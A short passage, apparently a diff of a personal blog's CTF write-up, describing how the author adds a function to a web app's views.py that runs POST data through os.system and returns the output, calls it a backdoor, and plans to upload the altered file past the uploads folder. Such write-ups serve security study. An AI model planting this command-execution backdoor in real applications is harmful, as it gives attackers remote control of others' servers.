vymvn/vymvn.github.io/_posts/2022-10-08-opensource.md

     processed_cmd = os.system(cmd)
     return processed_cmd
 ```
 added this function to `views.py` which will take any data we send with as `POST` request and process it as a command and send it back.
+Basically making ourselves a backdoor.

 Now we need to upload `views.py` but uploading it normally will place it in `/uploads` and that would be useless.